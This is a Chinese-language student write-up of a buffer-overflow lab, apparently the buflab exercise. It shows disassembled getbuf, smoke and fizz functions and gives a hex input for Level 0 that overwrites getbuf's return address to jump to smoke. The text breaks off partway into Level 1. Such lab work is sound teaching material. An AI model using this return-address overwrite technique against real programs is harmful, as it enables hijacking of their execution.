ID:alucard
Cookie:0x1b6069a4
Level 0:
要求getbuf()执行完后,跳到smoke()里面
080491f4<getbuf>:
80491f4: 55 push %ebp
80491f5: 89e5 mov %esp,%ebp
80491f7: 83ec 38 sub $0x38,%esp
80491fa: 8d45 d8 lea -0x28(%ebp),%eax
80491fd: 8904 24 mov %eax,(%esp)
8049200: e8f5 fa ff ff call 8048cfa <Gets>
8049205: b801 00 00 00 mov $0x1,%eax
804920a: c9 leave
804920b: c3 ret
08048c18<smoke>:
8048c18: 55 push %ebp
8048c19: 89e5 mov %esp,%ebp
8048c1b: 83ec 18 sub $0x18,%esp
8048c1e: c704 24 d3 a4 04 08 movl $0x804a4d3,(%esp)
8048c25: e896 fc ff ff call 80488c0<puts@plt>
8048c2a: c704 24 00 00 00 00 movl $0x0,(%esp)
8048c31: e845 07 00 00 call 804937b<validate>
8048c36: c704 24 00 00 00 00 movl $0x0,(%esp)
8048c3d: e8be fc ff ff call 8048900<exit@plt>
首先知道了smoke的函数地址为0x08048c18,我们要输入将其输入到ebp上面的返回地址,怎么输入呢?观察知-28(%ebp)是我们输入字符串开头,28+4=2c,即我们要先随便输入44个字符,再输入smoke()的地址
00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 18 8c 04 08
成功。
Level 1:
08048c42<fizz>:
8048c42: 55 push %ebp
8048c43: 89e5 mov %esp,%ebp
8048c45: 83ec 18 sub $0x18,%esp
8048c48: 8b45 08 mov 0x8(%ebp),%eax
8048c4b: 3b05 08 d1 04 08 cmp 0x804d108,%eax
8048c51: 7526 jne 8048c79<fizz+0x37>
8048c53: 8944 24 08 mov %eax,0x8(%esp)
8048c57: c744 24 04 ee a4 04 movl $0x804a4ee,0x4(%esp)
8048c5e: 08
8048c5f: c704 24 01 00 00 00 movl $0x1,(%esp)
8048c66: e855 fd ff ff call 80489c0<__printf_chk@plt>
8048c6b: c704 24 01 00 00 00 movl $0x1,(%esp)
8048c72: e804 07 00 00 call 804937b<validate>
8048c77: eb18 jmp 8048c91<fizz+0x4f>
8048c79: 8944 24 08 mov %eax,0x8(%esp)
8048c7d: c744 24 04 40 a3 04 movl $0x804a340,0x4(%esp)
8048c84: 08
8048c85: c704 24 01 00 00 00 movl $0x1,(%esp)
8048c8c: e82f fd ff ff call 80489c0 <__printf_chk@plt>
8048c91: c704 24 00 00 00 00 movl $0x0,(%esp)
8048c98: e863 fc ff ff call 8048900<exit@plt>
080491f4<getbuf>:
80491f4: 55 push %ebp
80491f5: 89e5 mov %esp,%ebp
80491f7: 83ec 38 sub $0x38,%esp
80491fa: 8d4